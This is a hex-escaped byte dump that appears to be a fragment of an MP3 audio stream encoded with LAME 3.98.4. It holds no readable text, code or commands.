5A\x93\x71\x7C\x26\xA3\x4D\xDE\x9D\xBE\xA3\x92\xE4\xC9\x9F\x96\xE6\xD8\xA6\x62\xCD\x9F\x29\x6C\xB1\xD6\x6C\x80\x1B\x81\x36\xD7\xA1\xE9\x88\xBC\x0B\x20\x80\xE1\x4C\xB1\x47\x6B\xC5\x1F\x9C\xE4\x33\x6D\x3E\xDC\x25\xD3\x87\x65\x53\xEA\x2F\xCD\x66\x0C\xA0\x80\x48\x32\x06\x72\xE3\x81\x0C\x03\x18\x8F\xA6\x30\x00\xE4\x12\x7C\xDD\x8D\x0A\x8C\x04\x00\x4A\x32\x57\x0D\xB5\x03\x16\xD3\x8B\xB0\x91\x03\x23\x0B\x08\xC4\x44\x06\x32\x25\xBA\x97\x80\x44\x1B\x30\x7C\x61\x99\x06\x21\x1C\x88\xCB\xD5\x4A\x71\x52\xB1\x61\x55\x86\x8C\xC8\xA5\x9A\x0A\x80\x15\xA0\x69\xB7\x46\x00\x84\x82\xEC\x05\x62\x12\x34\x25\x80\x4A\x69\x69\xBC\xA9\xD6\xEC\xAC\x00\x41\x02\x84\x08\xB8\x01\x01\x94\x87\x53\x70\xBC\x02\xAB\x35\x85\xA1\xAD\x33\x3A\x50\xDD\x43\x53\x90\xBE\x11\x35\xF4\xAA\x49\x96\x09\x08\xB1\xDD\xE6\xB8\x63\x49\x76\x8D\x86\x62\x81\x56\x9A\xDE\xAC\x61\x74\x9C\x4A\x23\x21\xA3\x88\x88\xFF\x83\x46\x02\x4C\x38\xF2\xC9\x99\x22\xAE\x64\x09\x19\x2A\x82\x97\x5C\x2C\x21\x24\x16\xB8\xC2\x44\x4A\x18\x64\x96\xDC\xC1\x44\xD6\x31\xC5\xA7\x8E\xAA\x81\xB1\x41\xCC\x73\x01\x87\xA0\x87\x8D\xA7\xF6\xAD\xE8\xFD\x8B\xF2\xDB\xEC\x42\x66\x44\xE0\x43\x8F\xC2\x95\xA1\xA3\x5C\x6D\x24\x89\x09\x0C\x40\x6D\x5E\x65\xF7\x47\xF7\x8A\x57\xB7\xDD\xA4\x40\xAB\x9D\x84\xB9\xE9\xC9\x15\x00\x00\x01\xAE\x09\x00\x00\x38\x00\x01\x4E\x00\x00\x00\x00\x22\x00\x00\x84\x16\xB1\x2E\x74\xCA\xF7\xBD\xEB\xEF\x7F\xFF\xFD\xCE\xCE\xF7\xB7\xBF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xC0\x00\x00\x00\x43\x08\x00\x01\xA3\x00\x01\x54\x00\x00\x00\x00\x2B\xFF\xF3\xC2\x64\xFB\x31\x52\x32\xEC\x02\x67\x19\x6E\x00\x00\x03\x48\x00\x00\x00\x00\xA9\x75\xE8\xBB\xF0\x04\x7E\x16\xDD\xEA\x25\xFA\x79\xAB\xC6\xF9\x41\x19\x93\xEB\x10\x8E\xB8\x48\x29\x22\x8F\x30\x34\x3A\xA4\x12\x3C\x46\xFA\xC3\xD0\x96\xED\xAC\x3B\xA2\xBE\x92\x41\xFC\x65\x6C\xB9\x9A\xAC\xF5\x04\x64\xE9\x86\xBE\x95\x61\x6C\xD8\x53\x25\x91\x33\xF4\xB8\x80\x9E\xC9\x5B\x0F\x76\x9E\x95\xAF\x5D\xE5\x77\x97\x23\x20\x6F\x1F\xF4\xBF\x6B\xEC\x41\x55\x1C\x46\x8E\xCB\xE0\x78\xB3\x80\xA9\x2F\x31\xF7\xED\xAF\xB7\x26\x02\xE3\xAE\xC5\xF8\xB4\xD7\x8B\x84\x8A\x0C\x0D\x76\x48\x99\x02\xB4\xA8\x3F\x25\x17\xDF\xC9\x4C\x9E\x8A\x82\x41\xDB\xDC\xA9\xC9\x44\xEB\xF7\x39\x73\x3A\x4C\x41\x4D\x45\x2E\xCF\x56\xCB\x9C\x61\x34\xAC\x00\x22\xC4\x8B\x02\x92\x79\x86\x38\x18\x84\x11\xE8\xC2\xCF\x99\x58\x0A\x1C\x0B\x20\x42\x9B\x65\x46\xF4\x98\x3D\x8A\x04\x22\x64\xAE\x05\x14\x69\x73\x15\x31\x18\x06\xE0\x6B\xD1\x33\x9B\xC3\x16\xD2\xDB\x1B\x58\x11\x22\x22\x10\xDC\x00\xCB\x34\xB3\x01\x02\x8A\x10\x62\x00\x60\x2E\x17\x30\x98\x23\x81\x72\x86\x47\x95\x27\x6E\x00\x5C\xC4\xDA\xB6\x31\xE0\x07\xA3\x14\x21\x26\x0C\x76\x44\x75\x36\xE9\xBA\x17\x2D\x0A\x8D\xE0\x0B\x3C\xA4\x86\xCC\x94\xAC\x00\x71\x0C\x6C\xDC\x10\x89\x76\xE0\x11\x00\x6F\x41\x41\xD6\x30\x69\x8B\x92\x10\xAB\x01\x00\x00\x98\x07\x76\x42\x25\xC1\x19\x20\x16\x0D\x13\xD2\x21\x1A\x8C\xA5\x85\xB9\x11\x86\x69\x24\x64\x20\x69\x28\xE4\x91\x44\xBD\xCC\x01\x00\x52\x99\x29\x98\x48\x18\x45\x19\x06\x99\xCA\x06\x22\x0C\xD4\xC9\x15\x80\x83\x5D\x34\xDD\x35\xC7\x32\x49\x50\xC0\x3C\x22\x62\x2F\x47\xB2\x31\x13\x33\x66\x3E\x9A\x08\x12\x41\xC8\x62\x2B\xA9\x54\x6E\x17\xDA\x7B\x52\x8A\x5B\xDB\xAD\x2E\x7F\xA1\x2E\xBB\x0C\xA5\x7B\xA0\xA7\x86\x1E\xAE\xE7\xC6\xE5\x00\x00\x01\xAE\x08\x00\x01\xA3\x00\x01\x6E\x00\x00\x00\x00\x2B\xFF\xF3\xC2\x64\xF9\x30\xD6\x2E\xF4\x02\xAC\xE4\x00\x80\x00\x03\x48\x01\x40\x00\x00\xB3\x90\x89\x7D\xA9\x54\x46\x09\xCA\x35\x07\x4A\x9F\x69\xE7\xF5\x9F\xC0\x37\xE0\x25\xD5\x10\x7F\xDD\xA6\xBB\x09\x76\x20\xD6\xB9\x40\xFC\x3E\x16\x12\xA5\xAF\xC0\x88\xF2\xE2\x34\x29\x43\xD3\x2E\x8D\xC1\x6D\x6A\xAC\x2E\x6E\x54\xF6\x45\x32\x6C\x32\xD7\x6D\x96\x52\x47\x5B\x1C\x82\xD5\x0C\x92\x1E\x86\xEE\x31\x28\x65\x9C\xE9\xF7\x9C\x86\x60\x6D\xB2\x78\x6E\x03\xCA\xFB\xBB\x9B\xC4\xE5\xAC\x23\x6D\x17\x88\x3D\x6F\x03\xCD\x29\x73\x62\xEC\xE1\xC5\x81\xA7\xE3\xCD\x7E\xA3\xB9\x42\xFE\xBB\x8E\xDC\xBA\x3D\x29\x81\xB1\x97\x72\xEC\xFC\xBA\x9E\x9B\x93\x58\xDC\xB3\x31\x47\x60\x8D\x4E\x75\x03\x04\x00\xB1\x28\x08\x98\x57\x08\xD1\x82\xF1\x43\xAE\x84\x49\x08\x03\x71\x60\x05\x33\xB3\x20\x73\x74\x35\x55\x42\x73\x96\xAD\x40\xA0\x50\x30\xC6\x5B\xA3\x62\x22\xE2\x7B\xD3\x85\x39\x0C\x07\x00\x20\xC0\x7C\x08\x4C\x05\xC0\x2C\xDD\xE9\x26\x0C\x39\x07\xC4\xC6\x34\x06\x96\xBA\x13\x4B\x76\x60\x56\x00\x26\x01\x00\x10\x81\xE6\x29\x42\x4C\x62\x22\x26\xA6\x22\x42\x28\x59\x38\x18\x30\x03\x4B\x72\x60\x1A\x04\xE6\x02\xA0\x14\x60\x38\x00\x44\x40\x88\x61\xC4\x1C\x26\x31\x20\xA4\x62\x74\x0F\x06\x19\x81\xCC\x5E\x60\xC0\x0A\x4F\x40\x60\x06\x20\x00\x80\x05\x59\x08\x34\x02\xC2\xA0\x28\x18\x01\x06\x28\x41\x40\x38\x03\x06\x14\xC0\xD8\x60\x02\x18\x86\x1E\x80\x81\x21\x5D\xA2\x00\x01\x82\x9A\x6C\x1E\x9F\xA8\xC8\xB6\x50\x90\x32\x01\x48\xF8\x10\x03\xA6\x01\x40\x14\x63\xC8\x13\x86\x18\x61\x12\x18\x02\xE6\x09\x20\xA6\x06\x08\x63\x00\xC0\x00\x30\x1D\x02\x15\x86\x2D\xF0\x50\x00\xD9\x50\x30\x01\x94\x7C\xB7\x45\xB8\x4A\x12\x40\x09\x04\x00\x71\x80\x18\x02\x88\xC0\x69\x1F\x68\x1B\x51\xE0\x54\x59\xC0\xC0\x34\x30\x40\x01\x47\x1C\x00\x00\x01\xAE\x08\x00\x01\xA3\x00\x01\x88\x00\x00\x00\x00\x2B\xFF\xF3\xC2\x64\xFF\x33\xB9\xFB\x06\x00\xCF\x78\x00\x80\x00\x03\x48\x01\x80\x00\x00\xC0\x14\x02\x4C\x02\x80\x78\xC0\x78\x0B\x0C\x05\x80\x18\xBC\xC0\x40\x06\x0C\x00\x10\xE0\x00\x56\x17\xED\x0A\x5A\xDC\xF5\x8E\xE3\xBC\x36\x30\x03\x26\x01\xA0\x06\x14\x00\x97\xD0\xBB\x4D\x72\xB4\xCF\xF3\x0A\xD7\x01\x40\x0C\x14\x00\xC3\x02\x90\x0A\x30\x1B\x01\xD3\x01\x70\x02\x28\x02\xFA\x4D\x72\xBF\x77\x77\x0B\xB8\x73\x1E\xE3\xAE\x67\xDB\x75\x77\x9F\xF6\xEE\x78\xEF\x1C\x35\xFC\xE6\x1D\xBD\x6B\xB6\xF3\xC7\x3E\xF3\xF7\xBE\x6F\xF3\xD6\x1B\xE7\xEE\x8F\x1D\xEB\x7A\xB3\x86\xB5\xF9\xF3\xB9\xD7\xDE\xA9\x77\xFF\x8D\xAC\x7F\x9F\xFA\xC6\xAE\xEE\x61\x63\x0C\xF0\xB3\x52\xFD\x4C\x75\x63\x9D\xBB\xF6\xFE\xDB\xEC\x25\xD9\x7F\xE3\x65\x2D\xFA\x15\x19\x4C\x41\x4D\x45\x33\x2E\x39\x38\x2E\x34\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x02\x48\x60\x68\x16\x62\xD0\x7C\x66\xA9\xE6\x6F\x7B\xC6\x2D\x47\x1D\xD8\x86\x1D\x01\xFE\x1A\xA0\x73\x86\x54\x66\x42\xAE\x87\xB3\x1B\x86\x03\x04\xA6\x5B\x83\x46\x03\x1E\x86\x92\x88\x86\x42\x9E\x66\x0F\x92\xE6\xD6\x05\xE6\x59\x94\x24\x01\x89\x9C\x6D\x69\x81\xA4\x89\xB3\x67\x59\x85\x07\xA1\xAE\xC5\x71\x92\xAC\x59\x92\x62\x99\x9C\xC1\x89\x82\x45\xC9\x84\xA1\x21\x8C\x44\x31\x8C\x83\xA1\x87\x20\xB8\xB0\xD8\x65\x81\xD4\x2A\x2D\x97\x6C\xC4\x41\xCC\xC0\xC1\xC8\xCA\x21\xE0\xC5\x24\x1C\x06\x09\x98\x18\x17\x98\x76\x05\x99\x7C\x10\x18\x4A\x00\x98\x9A\x1C\x98\x32\x34\x18\x68\x07\xC6\x01\xC2\x41\x28\x8E\x81\x23\x01\x40\xC0\x08\x00\x8E\x81\x03\x69\x80\x22\x69\x83\x60\x51\x85\xA1\x91\x84\x81\x51\x80\x02\x99\x81\x01\x68\x70\x46\x62\x00\xBE\x61\x28\x22\x2A\x17\x80\x04\xA3\x02\x03\x33\x00\x00\x01\xAE\x09\x00\x00\x8F\x00\x01\x90\x00\x00\x00\x00\x22\x00\x00\x84\x1A\xB1\x3F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFE\x15\x10\xC2\x18\x42\x00\xE1\x24\x03\x4B\xE0\x94\x10\x8B\xBE\x3F\x2F\xAC\x7A\x6A\x3A\x48\x24\x83\x00\xD4\x10\xBE\x0C\x00\xDF\xD5\x78\x18\x06\xE5\x65\xC1\x02\x97\xF3\xCA\x43\x31\xDE\xAB\x51\xEE\xBE\xD9\x8A\x94\xFF\x62\xA2\x71\x70\x54\xD7\xFF\xFE\x16\x41\x11\x52\xE9\x3C\x3F\xDA\xCA\xAB\x25\x9D\xCA\xF1\xFD\x57\x64\x2F\x9F\x57\x7F\x55\xF2\x4A\x22\x65\x6E\x11\xF2\x29\xD3\x36\xDB\x55\x0F\x38\x78\x78\x20\x93\x7F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xC0\x00\x00\x00\x9A\x08\x00\x01\xA3\x00\x01\xA2\x00\x00\x00\x00\x2B\xFF\xF3\xC2\x64\xC2\x29\xE9\x03\x24\x03\xEE\xF4\x01\x00\x00\x03\x48\x01\xC0\x00\x00\x18\xC4\x41\x62\xA4\xC5\x00\xD8\xC6\xC1\xD0\xC6\x00\xA8\xC2\x00\x6C\x14\x51\x18\x18\x06\x27\x08\x24\x02\x02\x86\x63\x20\x81\x85\x20\xDB\xB8\x60\xB0\x5C\x60\x60\x08\x18\x21\x88\x01\x3A\xED\x38\x04\x02\x2E\xA4\x35\x1E\x03\xC9\x80\xC2\xEF\x41\x2C\x3D\x88\x3B\xA9\x8E\xBB\x23\xEF\x13\x34\x6B\x30\x0C\x63\x06\x48\xFB\xD9\xC5\xFC\x8A\xC2\x9F\xB7\x61\xDA\x92\xBD\xF5\x61\x8A\xBA\xEC\x3F\x9B\xFF\x7F\xFF\xFF\xAC\xBB\x9E\x7C\x1D\xAC\xC1\x10\xE3\x43\x60\xCB\x4E\x34\xB8\x4C\x18\x4A\x01\x71\x56\x0F\x38\x16\x0C\x89\xCE\xC2\x0A\x20\x0C\x9E\x30\x21\x3E\x44\x02\x28\x81\x52\x83\x95\x4C\x41\x4D\x45\x33\x2E\x39\x38\x2E\x34\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x03\x50\x60\x52\x0C\x26\x0B\xE6\x08\x65\xBA\x71\x26\x12\x81\x00\x61\x36\x18\x86\x37\x00\xCC\x61\x20\xC8\x06\x4A\x81\x52\x61\x8E\x1B\xE6\x01\xA5\x54\x63\x84\x5E\x66\x2D\xA2\xCE\x64\x8C\x70\x06\x59\xCC\xEC\x65\xCC\x36\x86\x2D\x0B\xA7\x14\xE8\xA7\x24\x11\xE6\x44\x9C\x20\x02\xC4\xD7\x8E\x70\xD6\x55\xEC\xC1\x36\xB0\xC7\x51\xC4\xC6\xC1\xA4\xC6\x06\x28\xCE\xF0\xCC\xD9\x13\xC8\xC2\xD3\xAC\xD1\xE0\x78\xC1\x22\x68\xD8\x34\x6C\xC9\x52\x7C\xC2\xC4\xE0\xC8\x45\x08\xC6\x24\x98\x0C\xA8\x19\x3E\x4B\x19\x80\x20\x1A\x46\x91\x9B\x1B\x6C\x9C\x56\x1F\x98\xFA\x3F\x9A\x92\x71\x99\x0E\xBB\x99\x44\x44\x98\x60\x1C\x99\xBA\x0E\x99\x38\x51\x03\x83\x83\x0E\x06\x43\x05\x83\x00\x08\x52\x62\xC8\x72\x64\xF1\x24\x60\xA0\x16\x02\x23\xC8\x83\x02\x02\x43\x23\x9D\x33\xB7\x93\x2D\x4C\x33\xA0\xE1\xAC\x33\x5C\x0E\x03\x00\x00\x01\xAE\x08\x00\x01\xA3\x00\x01\xBC\x00\x00\x00\x00\x2B\xFF\xF3\xC2\x64\xC5\x2A\x45\x05\x1E\x03\x7B\xBB\x4C\x00\x00\x03\x48\x00\x00\x00\x00\x1A\x05\x8A\xCE\x70\x28\xC7\x86\xC5\x84\xCC\xB9\x68\xE1\x2D\x0D\x98\x00\x66\xB9\x18\x8C\x1D\x40\x58\x08\xE1\x22\x8E\x9A\x71\x2E\x81\x81\xE6\xD8\xB4\x76\x02\x86\xD6\xA2\x42\x38\x67\x91\x46\xA4\x78\x69\x05\x66\x46\x46\x60\x23\xA6\x40\x34\x62\x02\x0A\x02\x60\x60\xB0\x4A\x9D\xA0\x63\x4B\x5E\x4B\xC0\x40\x00\x2C\x00\xED\x97\xCE\x54\x5D\x07\x55\x95\xA3\x83\x83\x22\x81\x1E\xF6\x0B\x65\x8A\x33\x74\xD0\x50\x46\xD1\xD0\x65\xAF\x5B\xDF\x28\x4F\x89\x86\x19\x4D\xDF\xFF\xFE\x06\x17\x12\xA0\x13\x09\xCA\x82\x42\xA5\x47\x0A\x06\x92\xAD\x46\x81\x65\xBD\x2A\x5A\xC3\xE4\x9A\x84\x2A\x4C\x41\x4D\x45\x33\x2E\x39\x38\x2E\x34\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\x0E\x0C\x0E\x80\xBC\xC3\x9C\x05\x0C\x29\x09\xDC\xCB\x0C\x7A\x0C\x75\x43\x7C\xC7\xD4\x5D\x0C\x0E\x50\xA0\xC8\x48\x53\x8C\x2C\x42\xC4\xC2\xA8\x2F\x8C\x7C\xC3\x40\xC3\x70\x1F\x0C\x24\x83\xE0\xC4\x50\x42\x43\x0E\xD4\xCE\xE2\x34\xDA\xEA\x94\xC9\x94\x34\xC2\x13\x00\xCB\xE6\x00\xF8\xEE\xC4\xCC\x32\x04\xCC\xF8\xD4\xCF\xBD\x94\xCC\x01\x38\xC6\xF3\x64\xC3\x35\xE8\xF7\x92\x30\xC9\xB1\x64\xC0\x13\xE0\xD9\x33\xB4\xCC\x43\xC0\xC6\xA0\x5C\x62\xF1\x32\xF4\x47\x32\x64\x70\x33\x08\xBB\x35\x40\xAE\x30\x8C\x37\x30\x18\x65\x39\x80\x8D\x3B\x9C\x85\x31\x88\xD7\x32\x30\x68\x34\x88\x17\x31\xA4\x41\x32\x34\x63\x0E\x30\x8C\xC4\x0E\xCC\x1C\x0B\x0C\x4F\x21\x8C\x55\x0A\x4C\x0A\x0B\x4C\x36\x25\x4C\xB1\x04\x0C\x31\x02\x8C\x61\x16\x46\x00\x00\x01\xAE\x09\x00\x00\xBF\x00\x01\xD3\x00\x00\x00\x00\x22\x41\x41\x41\x41\xB1\x3F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFC\x2F\xF0\xFE\x4E\x1D\x1E\xC0\xFC\xA7\x1E\x0B\xFF\xFF\xC2\xA8\x63\x56\xA9\x57\xC7\xE5\xF1\x52\xA9\xB6\xD9\x24\x86\x41\x80\x6E\x06\x00\x50\x03\x55\x03\x00\x1E\x0C\x03\x78\x42\x08\x3F\xF4\x56\xA8\xBB\xF2\xD8\xF8\x5F\x71\x55\xC3\x7F\x55\xDF\xC3\xE0\x7F\x60\xFC\x18\x02\x90\x60\x1A\x44\x80\x81\x40\x3C\xBD\x51\x74\x55\x9B\x3C\x07\xFC\x07\xF1\x3A\xA6\xDD\xFB\xDD\xCB\x0E\xED\x83\x00\xD4\x0C\x03\x08\x40\x00\xD0\x87\xF0\x82\x5C\x5F\x47\x8D\xAA\x1F\x30\x93\xF0\xCF\xD0\x43\xB3\xE5\xEA\xD5\xC6\xD5\xFE\xFC\x6B\x08\x24\x51\xFF\xE5\xBF\x98\x4C\xFA\x10\xE0\x95\xEC\x85\xD6\xD2\x71\xE0\x09\x3F\xFF\xFF\x6B\xA7\x87\xFA\x7B\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xF0\x00\x00\x00\xCA\x08\x00\x01\xA3\x00\x01\xD6\x00\x00\x00\x00\x2B\xFF\xF3\xC2\x64\xB2\x27\xFD\x03\x22\x02\x7B\xBB\x4D\x00\x00\x03\x48\x00\x00\x00\x00\x43\x23\x19\x04\x2D\xD1\xB8\xB4\x1A\x48\x30\x38\xD0\xD5\x2F\x8E\x14\x24\x40\x88\x58\x98\x30\x89\xA3\x8C\x1C\x30\x7B\x60\x75\x01\x86\x48\x80\xAC\x01\xE6\x64\x3C\xC6\xEE\xBA\x65\x20\xA7\x03\xB0\x24\x98\x6A\x8F\x46\xAF\x52\x6B\x39\x86\xC4\x24\x69\x4A\xC6\x7C\x1C\x62\xC8\xA0\xA7\x52\xD4\x09\x1C\x10\x80\xB5\x83\x0A\x37\x07\x14\xA5\x38\x10\x1D\x0E\x69\x8B\x02\xA8\xC3\x05\x4F\x68\x1D\xE1\x8B\x2E\x17\xC2\x71\xAC\x29\x6D\x24\x36\xF6\xBE\xB2\x15\x8B\x8B\x63\x2F\xD4\x7E\xC3\x96\x2E\x6C\x6E\x4B\x23\x65\x6D\xD1\x76\xB7\x9F\xFF\xFD\x20\x76\x0C\x72\x0D\x64\x16\x7D\xB4\xDF\x31\x4C\x41\x4D\x45\x33\x2E\x39\x38\x2E\x34\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x0C\x0C\x08\x41\xE8\xC9\x98\xA5\xCC\xCF\x4B\x84\xE1\x50\xAC\x8C\x44\xC9\xE4\xCC\xDC\x75\x0C\x93\xCA\xB4\xDF\x58\x49\x4C\x9A\x43\x48\xC9\x9C\xA6\x0C\xB9\xC7\xB4\xC3\x58\x33\x8C\xCE\x02\xC4\xD9\x94\xCB\x0C\xEF\x04\xD8\xC3\x58\x30\x0C\xBA\x08\x8C\xCE\x08\x53\x0C\x5F\x86\x78\xC0\x60\x89\x0C\x79\xCF\xA0\xC8\xC4\x45\x0C\x12\x83\x60\xCC\x71\x56\xCC\x89\x87\x0C\xC4\xD8\x63\x4C\x43\x46\x40\xC3\xF0\x9A\x8C\x2A\x84\x8C\xC7\xA8\x0B\x8C\x3A\xC2\x58\xC5\x08\x1D\x0C\x09\xC2\x64\xC4\xC0\x13\x4C\x1E\x0B\xB0\xC4\x58\x30\xCC\x6D\xC3\x70\xC0\xCC\x5E\x4C\x16\xC3\x88\xC3\x34\x19\x0C\x21\xC4\x40\xC5\x80\x80\x8C\x22\xC4\x90\xC7\x1C\x0E\x4C\x09\x42\xB0\xC0\x34\x3F\x0C\x03\x02\x44\xC4\x60\x70\xCC\x2E\xC5\xB4\xC6\xB0\x18\xCC\x1B\x43\xE8\xC3\xB4\x34\x0C\x1E\xC2\x30\x74\x21\x4C\x25\x44\xD0\xC0\xF8\x40\x04\x84\x18\xC2\xD4\x1F\x8D\xAC\xB1\x34\x50\x60\xC5\x60\xD3\x48\xC0\x0C\xCB\x8F\x36\x3D\xAC\xC3\x00\x00\x01\xAE\x08\x00\x01\xA3\x00\x01\xF0\x00\x00\x00\x00\x2B\xFF\xF3\xC2\x64\xDC\x2D\x41\x03\x18\x02\x7B\xDC\x4C\x00\x00\x03\x48\x00\x00\x00\x00\x4B\x73\x1B\x89\xCC\xF2\x95\x32\x58\xF4\xD5\xD3\x23\xA1\xC2\xC5\x92\x26\xB3\x43\x0E\xA9\x4D\x7C\x4F\x05\x41\x81\x84\x53\x0F\x10\xCC\x36\xC0\x30\x51\x84\xD9\x4A\xB3\x50\x25\x4E\x06\xA6\x31\xF6\x2C\xC1\x61\x63\xB8\x00\x8D\xCA\x74\x34\xC0\x34\xC6\x05\xC1\x19\x0C\x2A\x0A\x0B\x0C\xCC\x2C\x03\x05\x02\x00\xA2\x71\x60\xCA\x59\x08\x41\x2C\xE8\xB2\x0C\x51\x1C\x55\x89\x90\xA4\x4A\x6B\x21\xC5\x9A\x2D\x68\x1E\x06\x2A\x01\x5C\xD6\x40\xFA\x15\x00\xAB\x11\x54\x5B\xB0\xD0\x1D\x7D\x21\x32\x5E\x93\xA8\x20\x10\x83\xD2\xD8\x68\x0C\xCA\x51\x25\xDF\xFF\xFA\x11\x9B\xAE\xF7\x4E\x1D\x14\x4C\x41\x4D\x45\x33\x2E\x39\x38\x2E\x34\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x09\x1B\x51\x08\x38\x56\x28\x55\x32\x1A\xDD\x9A\x67\xE5\x99\x32\x00\x2B\xCD\x36\x70\xDC\xC6\xC3\x43\x28\x8A\x0D\x7E\x3E\x31\xF9\x14\x49\xCA\x66\x2E\xF9\x9E\x02\xC6\x09\x22\x19\x10\x6E\x63\xC0\x08\x85\xF4\x02\x50\x7B\xEF\x86\x74\x06\x19\x30\x22\x0C\x34\x71\x83\x16\x4C\x31\x50\x53\x17\x55\x12\x64\x31\x94\x47\x38\x05\x52\x60\xA2\xA6\x88\x6C\x4A\x06\x63\x80\xE9\x28\x61\x81\xE3\x40\x62\xC8\x46\x50\x78\x6C\x80\xE6\x14\x28\x65\xA1\xA4\xA0\x48\x10\x2F\x71\x83\x96\x84\x0C\x27\x31\x84\x03\x0F\x30\x18\x28\x38\xE0\x00\x92\x00\x00\x01\xAE\x08\x00\x01\xA3\x00\x02\x0A\x00\x00\x00\x00\x2B\xFF\xF3\xC2\x64\x81\x21\xD9\x9B\x34\x07\x73\x71\x5F\x00\x00\x03\x48\x00\x00\x00\x00\x70\xF1\x88\xC1\x10\x10\x69\x7F\x08\x03\x04\x8A\xCC\x54\x18\xC5\x42\x80\x43\x48\x91\x21\x30\x00\x04\xCF\x30\xF0\xA5\x56\x65\x48\x70\x80\x58\xC3\xAC\x5F\x85\x32\x5F\xF2\xC5\x60\x41\xD4\x90\x74\x0C\x14\x18\x07\x70\xBF\x02\xF8\x47\x21\x90\xC8\x98\xB8\xC9\x93\x02\xE1\x32\x59\x2B\x99\x19\x99\x0C\xC9\xB9\x17\x27\x09\x92\x99\xE3\x32\x05\x26\x24\xA2\x09\x19\x9A\x99\x1B\x97\xC9\x66\x28\x90\x72\xA1\x0E\x30\x66\xFF\xFF\xFF\xFF\xFF\x65\xD0\x76\x5A\x0F\x4F\x49\xD2\x67\xD4\xBD\xD6\x9B\x24\xCA\x77\x39\x3A\x15\x04\x43\x02\xAF\x0C\x11\x15\x60\xD3\x46\x46\xF9\x63\x59\x47\x8E\xA9\x4C\x41\x4D\x45\x33\x2E\x39\x38\x2E\x34\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x02\x80\x60\x44\x05\xA6\x41\x63\x9A\x61\x88\x0D\x26\x20\xC2\xB0\x62\x0C\x40\xA6\x5F\x42\x0E\x62\x50\xD1\xE6\x0F\x00\x82\x63\xFE\x1A\xC6\x18\x00\x70\x62\xCA\x1F\x26\x05\x61\xC6\x62\xA8\x20\x86\x3E\x01\xC4\x64\x2A\x1D\x06\x4A\x18\x26\x3F\x15\xE6\xD7\x8C\x26\x68\x1B\x40\x42\x08\xEB\x89\x34\xC7\x83\x80\xD9\xF0\xEC\xCC\xA2\x80\xC0\x51\x00\xD0\xD9\x04\xCC\xA2\x04\xD4\x01\x98\xC8\x93\x70\xC7\x54\xC4\x77\x82\x90\xC3\x22\x48\xC3\x12\xA0\xC0\x25\x38\xD5\xD1\xB0\xCD\x63\x04\xC1\xA2\x80\xC0\x70\x98\x84\x1C\x2B\x31\x0C\x58\x39\x8D\x69\x26\xCC\x3A\x0C\x0C\x9A\x05\xCC\xCE\x48\x4C\xB5\x2D\xCC\xB6\x0B\xCC\x43\x21\x00\xC0\x59\x82\x02\x71\x85\x80\xB1\x86\x85\xF9\x87\x82\x69\x93\xE1\x00\x00\x01\xAE\x09\x00\x00\xAF\x00\x02\x16\x00\x00\x00\x00\x22\x00\x00\x84\x22\xB1\x3F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFC\x7F\x3F\x7A\x73\xFF\xFF\x8B\x03\x3D\x24\x03\x9F\xEF\xEF\x50\x60\x04\x01\x80\x15\x06\x01\xC8\x18\x06\xD5\x77\xC0\x18\x25\x52\xFC\x11\xE8\x8D\xE8\x04\xE9\xCF\x70\x41\x06\x00\x3C\x03\xC1\x80\x10\x1F\xD1\xF0\x07\x97\x0F\x3E\x96\x7E\x21\x87\x20\x62\xB5\x57\xEA\x27\xE5\x7B\xF5\x2E\x57\x3D\x15\xA8\xAA\x29\x9F\xFF\xFD\xC0\xCC\x2C\x82\xE0\x67\xE2\x52\x